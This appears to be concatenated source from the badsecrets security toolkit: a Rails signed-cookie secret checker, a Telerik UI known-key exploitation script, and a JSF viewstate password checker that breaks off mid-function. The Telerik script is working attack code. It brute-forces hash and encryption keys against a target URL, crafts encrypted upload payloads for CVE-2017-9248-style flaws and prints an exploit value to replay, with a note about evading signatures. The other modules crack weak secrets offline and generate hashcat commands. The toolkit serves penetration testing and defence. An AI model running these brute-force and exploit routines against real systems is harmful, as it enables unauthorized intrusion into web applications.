import re
import hmac
import json
import base64
import binascii
import urllib.parse
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from Crypto.Protocol.KDF import PBKDF2
from badsecrets.base import BadsecretsBase


class Rails_SecretKeyBase(BadsecretsBase):
    identify_regex = re.compile(r"^[\.a-zA-z-0-9\%=]{32,}--[\.a-zA-z-0-9%=]{16,}$")
    description = {"product": "Rails Signed Cookie", "secret": "Rails secret_key_base", "severity": "HIGH"}

    def rails(self, rails_cookie, secret_key_base):
        split_rails_cookie = urllib.parse.unquote(rails_cookie).split("--")
        data = split_rails_cookie[0]

        # Cookie is likely signed but not encrypted
        if split_rails_cookie[0].startswith("eyJ"):
            signature = split_rails_cookie[1]
            try:
                hash_alg = self.search_dict(self.hash_sizes, len(binascii.unhexlify(signature)))[0]
            except binascii.Error:
                return None
            hmac_secret = PBKDF2(secret_key_base, "signed cookie", 64, 1000)
            h = hmac.new(hmac_secret, data.encode(), hash_alg)
            if h.hexdigest() == signature:
                return {"json_data": base64.b64decode(data), "hash_algorithm": hash_alg}

        # Cookie is likely Rails 4/5/6 AES-CBC Cookie
        elif len(split_rails_cookie) == 2:
            try:
                encrypted_data = base64.b64decode(data).decode()
                iv = encrypted_data.split("--")[1]
                data = encrypted_data.split("--")[0]
            except (UnicodeDecodeError, IndexError, binascii.Error):
                return

            if len(base64.b64decode(iv)) == 16:
                aes_secret = PBKDF2(secret_key_base, "encrypted cookie", 64, 1000)
                cipher = AES.new(aes_secret[:32], AES.MODE_CBC, base64.b64decode(iv))
                try:
                    dec = unpad(cipher.decrypt(base64.b64decode(data)), 16)
                    json_data = json.loads(dec.decode())
                    return {"json_data": json_data, "encryption_algorithm": "AES_CBC"}
                except ValueError:
                    pass

        # Cookie is likey Rails 6 AES-GCM
        elif len(split_rails_cookie) == 3:
            iv = split_rails_cookie[1]
            aes_secret = PBKDF2(secret_key_base, "authenticated encrypted cookie", 64, 1000)
            cipher = AES.new(aes_secret[:32], AES.MODE_GCM, nonce=base64.b64decode(iv))

            try:
                dec = cipher.decrypt(base64.b64decode(data))
                json_data = json.loads(dec.decode())
                return {"json_data": json_data, "encryption_algorithm": "AES_GCM"}
            except ValueError:
                return None

    def check_secret(self, rails_cookie):
        if not self.identify(rails_cookie):
            return None
        for l in self.load_resources(["rails_secret_key_base.txt"]):
            secret_key_base = l.rstrip()
            r = self.rails(rails_cookie, secret_key_base)
            if r:
                return {"secret": secret_key_base, "details": r}
        return None



#!/usr/bin/env python3
# badsecrets - Telerik UI known key exploitation tool
# Black Lantern Security - https://www.blacklanternsecurity.com
# @paulmmueller

import os
import re
import sys
import string
import base64
import random
import urllib.parse
import argparse
import requests
from itertools import chain

from requests.packages.urllib3.exceptions import InsecureRequestWarning

from Crypto.Cipher import AES
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(SCRIPT_DIR))

from badsecrets import modules_loaded

Telerik_HashKey = modules_loaded["telerik_hashkey"]
Telerik_EncryptionKey = modules_loaded["telerik_encryptionkey"]


def random_hex_string(length):
    random_digits = [random.choice(string.hexdigits) for _ in range(length)]
    return "".join(random_digits).lower()


def validate_url(
    arg_value,
    pattern=re.compile(
        r"^https?://((?:[A-Z0-9_]|[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_])[\.]?)+(?:[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_]|[A-Z0-9_])(?::[0-9]{1,5})?.*$",
        re.IGNORECASE,
    ),
):
    if not pattern.match(arg_value):
        raise argparse.ArgumentTypeError("URL is not formatted correctly")
    return arg_value


telerik_versions = [
    "2007.1.423",
    "2007.1.521",
    "2007.1.626",
    "2007.2.918",
    "2007.2.1010",
    "2007.2.1107",
    "2007.3.1218",
    "2007.3.1314",
    "2007.3.1425",
    "2008.1.415",
    "2008.1.515",
    "2008.1.619",
    "2008.2.723",
    "2008.2.826",
    "2008.2.1001",
    "2008.3.1105",
    "2008.3.1125",
    "2008.3.1314",
    "2009.1.311",
    "2009.1.402",
    "2009.1.527",
    "2009.2.701",
    "2009.2.826",
    "2009.3.1103",
    "2009.3.1208",
    "2009.3.1314",
    "2010.1.309",
    "2010.1.415",
    "2010.1.519",
    "2010.2.713",
    "2010.2.826",
    "2010.2.929",
    "2010.3.1109",
    "2010.3.1215",
    "2010.3.1317",
    "2011.1.315",
    "2011.1.413",
    "2011.1.519",
    "2011.2.712",
    "2011.2.915",
    "2011.3.1115",
    "2011.3.1305",
    "2012.1.215",
    "2012.1.411",
    "2012.2.607",
    "2012.2.724",
    "2012.2.912",
    "2012.3.1016",
    "2012.3.1205",
    "2012.3.1308",
    "2013.1.220",
    "2013.1.403",
    "2013.1.417",
    "2013.2.611",
    "2013.2.717",
    "2013.3.1015",
    "2013.3.1114",
    "2013.3.1324",
    "2014.1.225",
    "2014.1.403",
    "2014.2.618",
    "2014.2.724",
    "2014.3.1024",
    "2015.1.204",
    "2015.1.225",
    "2015.1.401",
    "2015.2.604",
    "2015.2.623",
    "2015.2.729",
    "2015.2.826",
    "2015.3.930",
    "2015.3.1111",
    "2016.1.113",
    "2016.1.1213",
    "2016.1.225",
    "2016.2.504",
    "2016.2.607",
    "2016.3.914",
    "2016.3.1018",
    "2016.3.1027",
    "2017.1.118",
    "2017.1.228",
    "2017.2.503",
    "2017.2.621",
    "2017.2.711",
    "2017.3.913",
]

telerik_versions_patched = [
    "2022.3.1109",
    "2022.3.913",
    "2022.2.622",
    "2022.2.511",
    "2022.1.302",
    "2022.1.119",
    "2021.3.1111",
    "2021.3.914",
    "2021.2.616",
    "2021.2.511",
    "2021.1.330",
    "2021.1.224",
    "2021.1.119",
    "2020.3.1021",
    "2020.3.915",
    "2020.2.617",
    "2020.2.512",
    "2020.1.219",
    "2020.1.114",
    "2019.3.1023",
    "2019.3.917",
    "2019.2.514",
    "2019.1.215",
    "2019.1.115",
    "2018.3.910",
    "2018.2.710",
    "2018.2.516",
    "2018.1.117",
]


# Heavily derived from https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py <3
class AsyncUpload:
    def __init__(self, url, include_machinekeys_bool=False, proxies={}, headers=None):
        self.url = url
        self.asyncupload_key = None
        if proxies == None:
            proxies = {}
        self.proxies = proxies
        self.headers = headers
        self.include_machinekeys_bool = include_machinekeys_bool
        self.telerik_hashkey = Telerik_HashKey()
        self.telerik_encryptionkey = Telerik_EncryptionKey()
        self.target_temp_folder = "C:\\windows\\temp\\"
        self.payload_file_name = "test.txt"

    def encrypt(self, plaintext, key, iv):
        encoded = ""
        for i in plaintext:
            encoded = encoded + i + "\x00"
        plaintext = encoded + (chr(16 - (len(encoded) % 16)) * (16 - (len(encoded) % 16)))
        cipher = AES.new(key, AES.MODE_CBC, iv)
        return base64.b64encode(cipher.encrypt(plaintext.encode())).decode()

    def add_hmac(self, string, version, hashkey):
        if int(version[:4]) >= 2017:
            hmac_generator = HMAC.new(key=bytes(hashkey.encode()), msg=string.encode(), digestmod=SHA256.new())
            encoded_hmac = base64.b64encode(hmac_generator.digest()).decode()
            return f"{string}{encoded_hmac}"
        return string

    def version_probe(self):
        derived_key, iv = self.telerik_encryptionkey.telerik_derivekeys_PBKDF1_MS("GreatScott!")
        data, multipart_boundary = self.rau_data_prep("1985.10.26", derived_key, iv, "ThinkMcFlyThink")
        session = requests.Session()
        session.proxies.update(self.proxies)
        request = requests.Request("POST", self.url, data=data)
        request = request.prepare()
        request.headers["Content-Type"] = (
            f"multipart/form-data; boundary=---------------------------{multipart_boundary}"
        )
        request.headers.update(self.headers)
        resp = session.send(request, verify=False)
        if "Exception Details: " in resp.text:
            print("Verbose Errors are enabled!")
            if "Telerik.Web.UI.CryptoExceptionThrower.ThrowGenericCryptoException" in resp.text:
                print("Version is Post-2020 (Encrypt-Then-Mac Enabled, with Generic Crypto Failure Message)")
            elif "Padding is invalid and cannot be removed" in resp.text:
                print("Version is <= 2019 (Either Vulnerable, or Encrypt-Then-Mac with separate failure Message)")
            else:
                print("Version could not be determined")
        else:
            print("Verbose Errors NOT enabled")

    def rau_data_prep(self, version, key, iv, hashkey):
        multipart_boundary = random_hex_string(14)
        enc_target_folder = self.add_hmac(self.encrypt("", key, iv), version, hashkey)
        enc_target_temp_folder = self.add_hmac(self.encrypt(self.target_temp_folder, key, iv), version, hashkey)
        enc_a = f'{{"TargetFolder":"{enc_target_folder}","TempTargetFolder":"{enc_target_temp_folder}","MaxFileSize":0,"TimeToLive":{{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000}},"UseApplicationPoolImpersonation":false}}'
        enc_b = f'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version="{version}", Culture=neutral, PublicKeyToken=121fae78165ba3d4'

        payload = ""
        payload += f"-----------------------------{multipart_boundary}\r\n"
        payload += 'Content-Disposition: form-data; name="rauPostData"\r\n\r\n'
        payload += f"{self.encrypt(enc_a,key,iv)}&{self.encrypt(enc_b,key,iv)}\r\n"
        payload += f"-----------------------------{multipart_boundary}\r\n"
        payload += 'Content-Disposition: form-data; name="file"; filename="blob"\r\n'
        payload += "Content-Type: application/octet-stream\r\n"
        payload += "\r\n"
        payload += f"{random_hex_string(8)}"
        payload += "\r\n"
        payload += f"-----------------------------{multipart_boundary}\r\n"
        payload += 'Content-Disposition: form-data; name="fileName"\r\n'
        payload += "\r\n"
        payload += f"{random_hex_string(8)}\r\n"
        payload += f"-----------------------------{multipart_boundary}\r\n"
        payload += 'Content-Disposition: form-data; name="contentType"\r\n'
        payload += "\r\n"
        payload += "text/html\r\n"
        payload += f"-----------------------------{multipart_boundary}\r\n"
        payload += 'Content-Disposition: form-data; name="lastModifiedDate"\r\n'
        payload += "\r\n"
        payload += "2020-01-02T08:02:01.067Z\r\n"  # randomize later to avoid signatures
        payload += f"-----------------------------{multipart_boundary}\r\n"
        payload += 'Content-Disposition: form-data; name="metadata"\r\n'
        payload += "\r\n"
        payload += f'{{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"{random_hex_string(12)}.txt"}}\r\n'
        payload += f"-----------------------------{multipart_boundary}--\r\n"
        payload += "\r\n"
        return bytes(payload, "utf8"), multipart_boundary

    @staticmethod
    def select_derive_algos(version):
        if int(version[:4]) <= 2017 or version == "2018.1.117":
            return ["PBKDF1_MS"]
        elif (int(version[:4]) >= 2020) or (int(version[:4]) == 2019 and int(version[5]) >= 2):
            return ["PBKDF2"]

        else:  # We don't have solid intelligence on these version so we will try both
            return ["PBKDF1_MS", "PBKDF2"]

    def solve_key(self):
        reported_early_indicator = False

        for telerik_version in chain(telerik_versions, telerik_versions_patched):
            print(telerik_version)
            hashkeys = (
                ["dummyvalue"]
                if int(telerik_version[:4]) < 2017
                else self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool)
            )
            for hashkey in hashkeys:
                for key in self.telerik_encryptionkey.prepare_keylist(
                    include_machinekeys=self.include_machinekeys_bool
                ):
                    derive_algos = self.select_derive_algos(telerik_version)
                    for derive_algo in derive_algos:
                        if derive_algo == "PBKDF1_MS":
                            derived_key, iv = self.telerik_encryptionkey.telerik_derivekeys_PBKDF1_MS(key)
                        elif derive_algo == "PBKDF2":
                            derived_key, iv = self.telerik_encryptionkey.telerik_derivekeys_PBKDF2(key)

                        data, multipart_boundary = self.rau_data_prep(telerik_version, derived_key, iv, hashkey)
                        session = requests.Session()
                        session.proxies.update(self.proxies)
                        request = requests.Request("POST", self.url, data=data)
                        request = request.prepare()
                        request.headers["Content-Type"] = (
                            f"multipart/form-data; boundary=---------------------------{multipart_boundary}"
                        )
                        request.headers.update(self.headers)
                        resp = session.send(request, verify=False)
                        if "Could not load file or assembly" in resp.text:
                            if reported_early_indicator == False:
                                print(
                                    "Detected early signs that target is likely vulnerable! Continuing to find vulnerable version..."
                                )
                                reported_early_indicator = True

                        if '{"fileInfo":{"FileName":"' in resp.text:
                            result_text = f"TARGET VULNERABLE! Version: [{telerik_version}] Encryption Key: [{key}]"
                            if hashkey != "dummyvalue":
                                result_text += f" Hash Key: [{hashkey}]"

                            result_text += f" Derive Algo: [{derive_algo}]"
                            print(result_text)
                            return
        print("Key(s) not found :(")


class DialogHandler:
    def __init__(self, url, include_machinekeys_bool=False, proxies={}, headers=None):
        self.url = url
        self.telerik_hashkey = Telerik_HashKey()
        self.telerik_encryptionkey = Telerik_EncryptionKey()
        self.encryption_key = None
        self.hash_key = None
        if proxies == None:
            proxies = {}
        self.proxies = proxies
        self.headers = headers
        self.include_machinekeys_bool = include_machinekeys_bool

    def probe_version(self, version):
        b64section_plain = f"Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version={version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4"
        b64section = base64.b64encode(b64section_plain.encode()).decode()
        plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,False"
        derivedKey, derivedIV = self.telerik_encryptionkey.telerik_derivekeys(
            self.encryption_key, self.key_derive_mode
        )
        ct = self.telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext)
        dialog_parameters = self.telerik_hashkey.sign_enc_dialog_params(self.hash_key, ct)
        dialog_parameters_data = {"dialogParametersHolder": dialog_parameters}
        r = requests.post(
            self.url, data=dialog_parameters_data, headers=self.headers, verify=False, proxies=self.proxies
        )
        if r.status_code != 500:
            print(version)
        if r.status_code == 200:
            return dialog_parameters

    def detect_derive_function(self):
        self.key_derive_mode = "PBKDF1_MS"
        KDF_probe_data = {"dialogParametersHolder": "AAAA"}
        res = requests.post(self.url, data=KDF_probe_data, proxies=self.proxies, headers=self.headers, verify=False)
        resp_body = res.text

        if (
            "Exception of type 'System.Exception' was thrown" in resp_body
            or "The cryptographic operation has failed!" in resp_body
        ):
            self.key_derive_mode = "PBKDF2"
            print(
                "Target is a newer version of Telerik UI without verbose error messages. Hash key and Encryption key will have to BOTH match. PBKDF2 key derivation is used."
            )
        elif "Length cannot be less than zero" in resp_body:
            self.key_derive_mode = "PBKDF1_MS"
            print(
                "Target is post-CVE-2017-9248 patched but old enough to use older PBKDF1_MS key dervivation. Hash key can be solved independently."
            )
        elif "Invalid length for a Base-64 char array or string" in resp_body:
            return
        else:
            print(f"Unexpected response encountered: [{resp_body}] aborting.")
            sys.exit()

        print("Target is a valid DialogHandler endpoint. Brute forcing Telerik Hash Key...")

    def solve_key(self):
        # PBKDF1_MS MODE
        if self.key_derive_mode == "PBKDF1_MS":
            hashkey_counter = 0
            for hash_key_probe, hash_key in self.telerik_hashkey.hashkey_probe_generator(
                include_machinekeys=self.include_machinekeys_bool
            ):
                hashkey_counter += 1
                data = {"dialogParametersHolder": hash_key_probe}
                res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False)
                resp_body = urllib.parse.unquote(res.text)

                print(f"Tested {hashkey_counter} hash keys so far...") if hashkey_counter % 1000 == 0 else None

                if "The input data is not a complete block" in resp_body:
                    print(f"Found matching hashkey! [{hash_key}]")

                    self.hash_key = hash_key
                    break

                elif "The input is not a valid Base-64 string" in resp_body:
                    print("The target appears to be a pre-2017 version, and does not have a hash key.")
                    print("This means it should be vulnerable to CVE-2017-9248!!!")
                    return

            if self.hash_key:
                print("Since we found a valid hash key, we can check for known Telerik Encryption Keys")

                encryptionkey_counter = 0
                for encryption_key_probe, encryption_key in self.telerik_encryptionkey.encryptionkey_probe_generator(
                    hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool
                ):
                    encryptionkey_counter += 1
                    data = {"dialogParametersHolder": encryption_key_probe}
                    res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False)

                    (
                        print(f"Tested {encryptionkey_counter} encryption keys so far...")
                        if encryptionkey_counter % 1000 == 0
                        else None
                    )

                    if "Index was outside the bounds of the array" in res.text:
                        print(f"Found Encryption key! [{encryption_key}]")
                        self.encryption_key = encryption_key
                        break

                if self.encryption_key == None:
                    print("Could not identify encryption key.")
                    return
            else:
                print("Could not identify hash key.")
                return

        elif self.key_derive_mode == "PBKDF2":
            if self.include_machinekeys_bool:
                print(
                    "Warning: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW"
                )
                print("Try without the MachineKeys first!")
            print("About to bruteforce hash key and encryption key combinations...")
            count = 0
            for hash_key in self.telerik_hashkey.prepare_keylist(include_machinekeys=self.include_machinekeys_bool):
                for encryption_key_probe, encryption_key in self.telerik_encryptionkey.encryptionkey_probe_generator(
                    hash_key, self.key_derive_mode, include_machinekeys=self.include_machinekeys_bool
                ):
                    count += 1
                    data = {"dialogParametersHolder": encryption_key_probe}
                    res = requests.post(self.url, data=data, proxies=self.proxies, headers=self.headers, verify=False)
                    if "Index was outside the bounds of the array" in res.text:

                        print(f"Found Encryption key! [{encryption_key}]")
                        print(f"Found matching hashkey! [{hash_key}]")

                        self.encryption_key = encryption_key
                        self.hash_key = hash_key
                        break

                    (
                        print(f"Tested {count} hash key / encryption key combinations so far...")
                        if count % 1000 == 0
                        else None
                    )

                if self.hash_key:
                    break

        if self.hash_key and self.encryption_key:
            return True
        else:
            print("Did not find hashkey / encryption key. Exiting.")

    def solve_version(self):
        print(
            "Both encryption key and hash key were found: attempting to brute-force Telerik UI version and generate exploitation payload"
        )

        versions = []
        for v in telerik_versions + telerik_versions_patched:
            versions.append(v)
        undotted_versions = []
        for v in telerik_versions:
            undotted_versions.append(re.sub(r"\.(?=\d+$)", "", v))
        versions += undotted_versions

        for version in versions:
            dialog_parameters = self.probe_version(version)
            if dialog_parameters:
                self.version = version
                self.dialog_parameters = dialog_parameters
                return True


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        "--url",
        type=validate_url,
        help="The URL of the page to access and attempt to pull viewstate and generator from",
        required=True,
    )

    parser.add_argument(
        "-p",
        "--proxy",
        help="Optionally specify an HTTP proxy",
    )

    parser.add_argument(
        "-a",
        "--user-agent",
        help="Optionally set a custom user-agent",
    )

    parser.add_argument(
        "-m", "--machine-keys", help="Optionally include ASP.NET MachineKeys when loading keys", action="store_true"
    )

    parser.add_argument(
        "-f",
        "--force",
        help="Force enumeration of vulnerable AsyncUpload endpoint without user confirmation",
        action="store_true",
    )
    args = parser.parse_args()

    if not args.url:
        return

    include_machinekeys_bool = False
    if args.machine_keys:
        include_machinekeys_bool = True
        print("MachineKeys inclusion enabled. Bruteforcing will take SIGNIFICANTLY longer")

    proxies = None
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}

    headers = {}
    if args.user_agent:
        headers["User-agent"] = args.user_agent
    else:
        headers["User-agent"] = (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
        )

    if "webresource.axd" in args.url.lower():
        print("Assuming target is a AsyncUpload Endpoint...")
        asyncupload_endpoint = args.url.split("?")[0] + "?type=RAU"
        try:
            res = requests.get(asyncupload_endpoint, proxies=proxies, headers=headers, verify=False)
        except (requests.exceptions.ConnectionError, requests.exceptions.ConnectTimeout):
            print(f"Error connecting to URL: [{args.url}]")
            return
        resp_body = urllib.parse.unquote(res.text)
        if "RadAsyncUpload handler is registered succesfully" not in resp_body:
            print(f"URL does not appear to be a Telerik UI AsyncUpload Endpoint")
            return
        else:
            print("Target is confirmed to be Telerik UI Async Upload Endpoint")

            rau = AsyncUpload(
                asyncupload_endpoint,
                proxies=proxies,
                headers=headers,
                include_machinekeys_bool=include_machinekeys_bool,
            )
            rau.version_probe()
            if not args.force:
                response = input("Ready to attempt brute-force, press enter to continue...")
                if response.lower() != "":
                    print("aborting...")
                    sys.exit(2)
            rau.solve_key()
            return

    else:
        print("Assuming target is Telerik UI DialogHandler...")
        try:
            res = requests.get(args.url, proxies=proxies, headers=headers, verify=False)
        except (requests.exceptions.ConnectionError, requests.exceptions.ConnectTimeout):
            print(f"Error connecting to URL: [{args.url}]")
            return
        resp_body = urllib.parse.unquote(res.text)
        if "Loading the dialog..." not in resp_body:
            print(f"URL does not appear to be a Telerik UI DialogHandler")
            return
        else:
            print(f"Confirmed target is Telerik UI DialogHandler")

        dh = DialogHandler(
            args.url, proxies=proxies, headers=headers, include_machinekeys_bool=include_machinekeys_bool
        )
        dh.detect_derive_function()
        if dh.solve_key():
            print("solved key!")
            if dh.solve_version():
                print(f"Found Telerik Version! [{dh.version}]")
                print("Submit a POST request, with dialogParametersHolder POST parameter set to this value")
                print("Then use Burp Suite to replay the request in the browser")
                print("Dialog Parameters Exploit Value:")
                print(urllib.parse.quote_plus(dh.dialog_parameters))


if __name__ == "__main__":
    print("badsecrets - Telerik UI known key exploitation tool\n")
    main()



import re
import hmac
import base64
import hashlib
import binascii
import urllib.parse
from contextlib import suppress
from Crypto.Util.Padding import unpad
from Crypto.Cipher import DES3, AES, DES
from badsecrets.helpers import Java_sha1prng
from badsecrets.base import BadsecretsBase


class Jsf_viewstate(BadsecretsBase):
    myfaces_candidate_decryption_algorithms = [DES3, AES, DES]

    identify_regex = re.compile(
        r"^(?:[%A-Za-z0-9+\/]{4}){8,}(?:[%A-Za-z0-9+\/]{4}|[%A-Za-z0-9+\/]{3}=|[%A-Za-z0-9+\/]{2}={2})$"
    )
    description = {
        "product": "Java Server Faces Viewstate",
        "secret": "com.sun.faces.ClientStateSavingPassword",
        "severity": "CRITICAL",
    }

    hashcat_hashalg_table = {"MD5": "50", "SHA1": "150", "SHA256": "1450", "SHA384": "10800", "SHA512": "1750"}

    def carve_regex(self):
        return re.compile(r"<input.+?name=\"javax\.faces\.ViewState\".+?value=\"([^\"]*)\"")

    # Mojarra 1.2.x - 2.0.3
    def DES3_decrypt(self, ct, password):
        x = Java_sha1prng(password)
        derivedKey = x.get_sha1prng_key(24)
        cipher = DES3.new(
            derivedKey, DES3.MODE_CBC, iv=b"AAAAAAAA"
        )  # Theres no way to determine the IV, as it lives in server memory. So, we can pass anything in - we can still decrypt all except for block #1
        try:
            decrypted = cipher.decrypt(base64.b64decode(ct))
            if b"java." in decrypted:
                return True
        except (ValueError, binascii.Error):
            return False
        return False

    # Mojarra 2.2.6 - 2.3.x
    def AES_decrypt(self, ct, password_bytes):
        try:
            ct_bytes = base64.b64decode(ct)
        except (binascii.Error, ValueError):
            return False

        sig = ct_bytes[:32]
        iv = ct_bytes[32:48]
        data = ct_bytes[48:]
        h = hmac.new(password_bytes, digestmod=hashlib.sha256)
        h.update(iv)
        h.update(data)

        # We really only have to check the signature to know we can decrypt, since the HMAC and AES keys are derived from the same password
        if h.digest() == sig:
            # We decrypt anyway, just so we can determine compression
            cipher = AES.new(password_bytes, AES.MODE_CBC, iv)
            pt_b64 = unpad(cipher.decrypt(data), AES.block_size)
            return pt_b64

    def myfaces_mac(self, ct_bytes, password_bytes):
        candidate_hash_algs = list(self.hash_sizes.keys())
        for hash_alg in candidate_hash_algs:
            data = ct_bytes[: -self.hash_sizes[hash_alg]]
            sig = ct_bytes[-self.hash_sizes[hash_alg] :]

            h = hmac.new(password_bytes, data, hash_alg)
            if sig == h.digest():
                return (password_bytes, hash_alg)
            else:
                continue
        return (None, None)

    def myfaces_validate_decrypt(self, decrypted):
        uncompressed = self.attempt_decompress(base64.b64encode(decrypted))
        if uncompressed:
            if b"java." in uncompressed:
                decrypted = uncompressed

        if b"java." in decrypted:
            # instead of b64 encoding and looking for rO0, stay in bytes and look for as many as you can
            if b"\xAC\xED\x00\x05" in decrypted and ord(bytes([decrypted[4]])) in list(range(112, 126)):
                return (True, True, uncompressed)
            else:
                return (True, False, uncompressed)
        return (None, None, None)

    def myfaces_decrypt(self, ct_bytes, password_bytes, dec_algos, hash_sizes):
        invalid_iv_match = None
        for hash_size in hash_sizes:
            encrypted_data = ct_bytes[:-hash_size]

            for dec_algo in dec_algos:
                if str(dec_algo.__name__) == "Crypto.Cipher.DES" and len(password_bytes) != 8:
                    continue

                if str(dec_algo.__name__) == "Crypto.Cipher.DES3" and len(password_bytes) != 24:
                    continue

                if str(dec_algo.__name__) == "Crypto.Cipher.AES" and len(password_bytes) not in [16, 32, 64]:
                    continue

                for cipher_mode in ["CBC", "ECB"]:
                    if cipher_mode == "ECB":
                        cipher = dec_algo.new(password_bytes, dec_algo.MODE_ECB)
                        try:
                            decrypted = unpad(cipher.decrypt(encrypted_data), dec_algo.block_size)
                        except (ValueError, binascii.Error):
                            continue

                        validation_result, first_block_valid, uncompressed = self.myfaces_validate_decrypt(decrypted)
                        if validation_result and first_block_valid:
                            return (
                                password_bytes,
                                dec_algo.__name__.replace("Crypto.Cipher.", ""),
                                cipher_mode,
                                None,
                                True if uncompressed else False,
                            )

                    elif cipher_mode == "CBC":
                        iv_guesses = []
                        # the most common misconfiguration will be setting the key as the IV
                        # Todo: Include other common IV possiblities
                        if dec_algo.__name__ == "Crypto.Cipher.DES3" or dec_algo.__name__ == "Crypto.Cipher.DES":
                            iv_guesses.append(password_bytes[:8])
                        else:
                            iv_guesses.append(password_bytes[:16])

                        iv_guesses.append(dec_algo.block_size * b"\x00")
                        iv_guesses.append(dec_algo.block_size * b"\xFF")
                        iv_guesses.append(dec_algo.block_size * b"\x61")
                        iv_guesses.append(dec_algo.block_size * b"\x41")
                        iv_guesses.append(dec_algo.block_size * b"\x30")
                        iv_guesses.append(dec_algo.block_size * b"\x31")

                        for iv in iv_guesses:
                            cipher = dec_algo.new(password_bytes, dec_algo.MODE_CBC, iv=iv)
                            try:
                                decrypted = unpad(cipher.decrypt(encrypted_data), dec_algo.block_size)
                            except (ValueError, binascii.Error):
                                continue
                            validation_result, first_block_valid, uncompressed = self.myfaces_validate_decrypt(
                                decrypted
                            )
                            if validation_result:
                                if first_block_valid:
                                    return (
                                        password_bytes,
                                        dec_algo.__name__.replace("Crypto.Cipher.", ""),
                                        cipher_mode,
                                        iv,
                                        True if uncompressed else False,
                                    )
                                else:
                                    invalid_iv_match = (
                                        password_bytes,
                                        dec_algo.__name__.replace("Crypto.Cipher.", ""),
                                        cipher_mode,
                                        b"INVALID",
                                        True if uncompressed else False,
                                    )
                                    continue

        # The decryption key was valid, but the first block was not - this indicates that the mode is CBC and the IV is incorrect
        if invalid_iv_match:
            return invalid_iv_match
        else:
            return (None, None, None, None, None)

    def get_hashcat_commands(self, jsf_viewstate_value, *args):
        commands = []
        try:
            decoded_viewstate = base64.b64decode(urllib.parse.unquote(jsf_viewstate_value))
        except binascii.Error:
            return []
        sig = decoded_viewstate[:32]
        data = decoded_viewstate[32:]

        candidate_hash_algs = list(self.hash_sizes.keys())
        for hash_alg in candidate_hash_algs:
            data = decoded_viewstate[: -self.hash_sizes[hash_alg]]
            sig = decoded_viewstate[-self.hash_sizes[hash_alg] :]

            description = f"HashAlg: [{hash_alg}] Implementation: [Myfaces"
            if hash_alg == "SHA256":
                description += " / Mojarra 2.2.6 - 2.3.x]"
            else:
                description += "]"

            commands.append(
                {
                    "command": f"hashcat -m {self.hashcat_hashalg_table[hash_alg]} -a 0 {sig.hex()}:{data.hex()} --hex-salt path/to/dictionary.txt",
                    "description": description,
                }
            )

        return commands

    def check_secret(self, jsf_viewstate_value):
        if not self.identify(jsf_viewstate_value):
            return None

        jsf_viewstate_value = urllib.parse.unquote(jsf_viewstate_value)

        if jsf_viewstate_value.startswith("rO0"):
            return {
                "secret": "UNPROTECTED",
                "details": {
                    "source": jsf_viewstate_value,
                    "info": "JSF Viewstate (Unprotected)",
                    "compression": False,
                },
            }

        uncompressed = self.attempt_decompress(jsf_viewstate_value)
        if uncompressed:
            if b"java." in uncompressed:
                return {
                    "secret": "UNPROTECTED (COMPRESSED)",
                    "details": {
                        "source": jsf_viewstate_value,
                        "info": "JSF Viewstate (Unprotected, Compressed)",
                        "compression": True,
                    },
                }
            else:
                jsf_viewstate_value = base64.b64encode(uncompressed)

        for l in set(list(self.load_resources(["jsf_viewstate_passwords.txt", "top_100000_passwords.txt"]))):
            with suppress(ValueError):
                password = l.rstrip()
                if self.DES3_decrypt(jsf_viewstate_value, password):
                    return {
                        "secret": password,
                        "details": {
                            "source": jsf_viewstate_value,
                            "info": "JSF Viewstate (Mojarra 1.2.x - 2.0.3) 3DES Encrypted",
                            "compression": True if uncompressed else False,
                        },
                    }

        # Mojarra decryption
        for l in self.load_resources(["jsf_viewstate_passwords_b64.txt"]):
            with suppress(ValueError):
                password_bytes = base64.b64decode(l.rstrip())
                decrypted = self.AES_decrypt(jsf_viewstate_value, password_bytes)

                if decrypted:
                    uncompressed = self.attempt_decompress(base64.b64encode(decrypted))
                    if uncompressed:
                        if b"java." in uncompressed:
                            decrypted = uncompressed

                    decrypted_b64 = base64.b64encode(decrypted).decode()
                    if decrypted_b64.startswith("rO0"):
                        return {
                            "secret": base64.b64encode(password_bytes).decode(),
                            "details": {
                                "source": jsf_viewstate_value,
